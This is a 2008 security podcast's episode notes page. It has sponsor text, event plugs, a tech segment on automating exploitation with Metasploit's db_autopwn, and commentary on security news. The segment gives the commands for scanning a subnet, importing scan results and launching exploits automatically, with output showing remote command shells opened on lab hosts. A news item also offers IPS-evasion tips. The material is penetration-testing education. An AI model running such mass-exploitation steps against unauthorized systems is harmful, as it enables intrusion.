Episode124

From Paul's Security Weekly
Jump to: navigation, search
Palo Alto Networks
Tenable Network Security
The SANS Institute
Pwnie Express
Black Hills Information Security

Sponsors

Core Security

This episode is sponsored by Core Security Technologies, helping you penetrate your network. Rock out with your 'sploit out and check out the client side exploit and web application testing modules! Listen to this podcast and qualify to receive a 10% discount on Core Impact, worlds best penetration testing tool.

Tenable Network Security

This podcast is also sponsored by Tenable network security. Tenable is a developer of enterprise vulnerability, compliance and log management software, but most notibly the creators of Nessus, the worlds best vulnerability scanner. Tenable Security Center software extends the power of Nessus through reporting, remediation workflow, IDS event correlation and much more. Tenable also offers a Direct Feed subscription for immediate access to new Nessus plugins, and compliance checks” Tenable – Unified Security Monitoring!

Astaro

Astaro offers the most complete and easy to use Internet security appliances available. The products combine best of breed applications, the proven quality of Linux and enterprise level performance, providing the latest protection with the best total cost of ownership. All products are available as software, hardware or virtual appliances, which allows users the flexibility to meet a wide variety of deployment scenarios.

One of the best things about Astaro is that it offers its products completely free for home use. All enterprise features and all subscriptions, including virus scanning, web content filtering, email filtering and VPN clients, are available in the home license for no cost. All you have to do is visit www.astaro.com, register, download the software and obtain the key, which protects up to 10 IPs. There are no sales people to talk to, no payment information to enter—it’s just free. Again, visit www.astaro.com for more information or to download the product and free home user license.

Announcements & Shameless Plugs

Live from the PaulDotCom Studios Welcome to PaulDotCom Security Weekly, Episode 124 for September 25th, 2008

Welcome to PaulDotCom Security Weekly, a show for security professionals, by security professionals.

  • PaulDotCom SANS Click-Through - Go there, register for fabulous SANS training! Go now!
  • ICE (Integrated Cyber Exercise) - Oct. 1-3 at SANS Las Vegas! - Now featuring observers from the the Air Force Cyber Command (P), Air Force Information Operations Center and United States Air Force Warfare Center. Paul and Larry have Team names: The Steadfast Buccaneers and the The Network Ninja Assassins!
  • NS2008! Paul giving keynote: Things That Go Bump In The Network: Embedded Device (In)Security and teaching SEC535, Network Security Projects Using Hacked Wireless Routers! Don't forget our live podcast immediately following!
  • ChicagoCon - October 27 - November 1, Talks by Ed Skoudis, Gregory Conti West Point, Author of "Security Data Visualization", Daniel V. Hoffman CTO SMobile Systems, EH-Net Columnist, Billy Rios/John Walton Microsoft Pen Testers (Blue Hat)

Episode Media

mp3 pt 1

mp3 pt 2

Tech Segment: Automating Exploitation With Metasploit's db_autopwn

There is tremendous value in identifying vulnerabilities in your network, whether from the outside looking in, or the inside looking out. I like to try to automate this process as best I can, then use manual methods to further verify my work. For example, lets say I want to quickly verify the results from an Nmap or Nessus scan, and see if any of the Windows hosts are vulnerable to common Microsoft exploits. I can use Metasploit to do this, as it will test for the common remotely exploitable Windows vulnerabilities.

The first step is to setup Metasploit with a database module and create a database:

msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
msf > db_create mynetwork
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: mynetwork
msf >

From here, I have many options. I can import Nmap results from a previous scan using the XML results (-oX):

msf > db_import_nmap_xml mynetwork.xml

Using the db_nmap module I can run Nmap directly from Metasploit and populate the database:

msf > db_nmap -sS -T4 -O 192.168.1.0/24
[*] exec: "/usr/local/bin/nmap" "-sS" "-T4" "-O" "192.168.1.0/24" "-oX" "/tmp/dbnmap.29736.0"
NMAP: 
NMAP: Starting Nmap 4.76 ( http://nmap.org ) at 2008-09-25 09:05 EDT

I can now launch exploits against known targets, but only by open port (since we ran Nmap and only collected the open port information):

msf > db_autopwn -p -e

-p means exploit the vulnerabilities according to open port, and -e gives the "exploit" command. When I do this, I give Metasploit a lot of work to do:

<snip>
[*] Launching exploit/netware/smb/lsass_cifs (19/727) against 192.168.1.244:445...
[*] Launching exploit/windows/http/badblue_passthru (20/727) against 192.168.1.52:80...
[-] Exploit failed: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)
[*] Started bind handler
[*] Trying target BadBlue 2.72b Universal...
[*] Server may not be vulnerable.
[*] Calling the vulnerable function...
[*] Successfully removed /config/password.txt
[*] Command shell session 1 opened (192.168.1.204:58664 -> 192.168.1.52:34657)
[*] Launching exploit/windows/iis/ms01_023_printer (22/727) against 192.168.1.226:80...
[*] Started bind handler
<snip>

727 possible exploit vectors! That took a while. So, I decided to run Nessus against my network, then import the Nessus results:

msf > db_import_nessus_nbe windows.nbe

Now I run db_autopwn, and tell it to select modules based on the vulnerability reference:

msf > db_autopwn -x -e

This produces much better results:



msf > sessions -l

Active sessions
===============

  Id  Description    Tunnel                                     
  --  -----------    ------                                     
  1   Command shell  192.168.1.204:60530 -> 192.168.1.52:37541  
  2   Command shell  192.168.1.204:61047 -> 192.168.1.52:13917  
  3   Command shell  192.168.1.204:61306 -> 192.168.1.52:6112   
  4   Command shell  192.168.1.204:61350 -> 192.168.1.52:5646   

msf > sessions -i 2
[*] Starting interaction with 2...

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

Interview - Core Security Technologies Product Update

Stories Of Interest

PDF Attack Packs - [Larry] - Secure computing has discovered a collection of PDf attacks in the wild. What does this mean? Patch your Adobe Reader (and other readers too!). I've been working on some metadata stuff (go figure), and it is fairly easy to determine OS, PDF generator and version, as well as timeline. It will be real easy for an attacker to determine this info and deliver an appropriate attack.

Xerox taking printer security seriously? - [Larry] - This is a refreshing turn of events. Xerox announced a vulnerability in the WorkCentre multifunction devices, as the Samba server contained on them had a remote code execution condition (as seen with some of the Samba tree). They've acknowledged it, and provided a software update. Now the next challenge - how do you get them patched? There is no auto update for printers.

Aruba Mobility Controller Vuln? - [Larry] Aruba includes a default X.509 certificate in their mobility controller, which is the same on every device. Of Course! Aruba responds with verbiage from the system documentation, and from the support website, indicating that the cert should be changed, and that it is there for demonstration purposes. they even advice that a new cert is a good thing to do. Now, I don;t see this as a huge issue - almost all vendors that deliver appliances that I know of either pre-populate a cert, or generate a self signed one at install- which at that point, which is the lesser of two evils? You should always be putting up good certs on your boxes, but we all know that many don't and just run with the default! At least Aruba clearly advises customers to change the cert, and gives them the ability to do so - unlike, say MS RDP?

Nessus Released Virtual Appliance - [PaulDotCom] - One stop shopping vulnerability scanner. This is really smart, virtualization is where its at, and its important to be flexible, Many vuln scan vendors offer traditional software and even hardware solutions, but I believe that a VM is the best options in many cases. Why? Flexibily primarily, being able to stand up a Nessus scanner on any VM is handy, for the pen tester especially.

Cisco releases a ton of Patches - [PaulDotCom] - While this is your everyday, average vulnerability announcement, don't forget a couple of things: 1) Cisco routers run the Internet (primarily) 2) We talked a few weeks ago about shell code being available 3) Since they are embedded devices, most people don't patch right away (maintenance can be tricky, even if you are redundant). 4) Many devices are exposed to the Internet because they are outside the firewall, by design. To me, this is a recipe for disaster...

IDS is not going to die, but while will people start actually using an IPS for Prevention? - [PaulDotCom] - This heavily influenced study uncovered some interesting things.

  • Cisco is the IPS market leader, so to all blackhats and good intentioned security researchers, this is a good place to focus evasion efforts.
  • Even though deployed inline, most are not blocking any traffic - When will the business case for actually blocking traffic be made? Why is IPS to widley unsuccessful in the enterprise?
  • People don't update their filters! - This means that as an attacker, use the most recent versions of the exploit, maybe even the oldest, but stay away from anything in between. Not only use the latest exploits, but stay up-to-date with all of your tools that contain evasion techniques (ala exploit frameworks and payload generators).

Is manual compilation a problem? - [PaulDotCom] - While some say you will go blind, and others are convinced you will develop hair in your hands, is manual compilation a bad thing? I think it depends. I really try to stick to the package tree as best I can, but with so much software out there, it can be very hard, er difficult. So, what to do? Most distributions have a "bleeding edge" tree that you can tie into, OS X keeps things separate (MacPorts installs in /opt/local/ for example), so there are some ways around it. Really and truly evaluate the need to install non-distrobution maintained software, as it can come back to bite you in the end.

Porn Operators Hijack Pages on AARP Website - All I have to say is LOL. and there is a joke in here about male enhancement drugs, but I just can't come "UP" with one ;-)

10 Great Gadgets for Work and....HACKING! - [PaulDotCom] - Interesting little article describing some of the latest gadgets. I really want to test the security of these devices, fuzzing the wireless drivers, find CSRF holes in the web server, and maybe even a remote exploit (or two). So many things are wireless now! I mean, I scold people who discuss the Wifi SD card, but then I'm like thats kinda cool, I really want one, and the hacker in me wants to break it. There is really no point to this story, other than cool and hopefully some good things to come...

The security Catalyst gets robed - [Larry] - While on the road, their motorhome was broken into and computer gear stolen. Santa was very up front instating that while they did practice a good deal of safe computing practices, there were still some data loss issues. I bring this up, because, even as security pros, we make mistakes too! I for one, had a debian box on my home network (exposed to the internet too), that was behind on patches - including the Kaminisky DNS patch. It can happen to the best of us. The other thing to note - both of these happened at a "home" location, where your corporate workers may work from occasionally, with their corporate laptops. It's time to begin thinking about how to secure your mobile workforce while at home, if you haven't already. Why? Because you've don a great job on your security investments at your corporate offices, and the weakest link (both physically and technologically) is likely at the home office... see blog post and discussion for more.

Compliance Checklist != Security - [Larry] - No, it just means that you can pass an audit by demonstrating that you have stuff on the list, and not hat you are following best practices. As an example, HIPAA specifies that sensitive data must be encrypted over a public network. At that ROT 13 would be acceptable! With PCI, they still appear to allow the use of WEP, which is acceptable under the checklist, but we all know WEP can be broken quite easily.

NeoPwn - [Larry] - Cool! A hacktop in a phone with Backtrack based on openmoko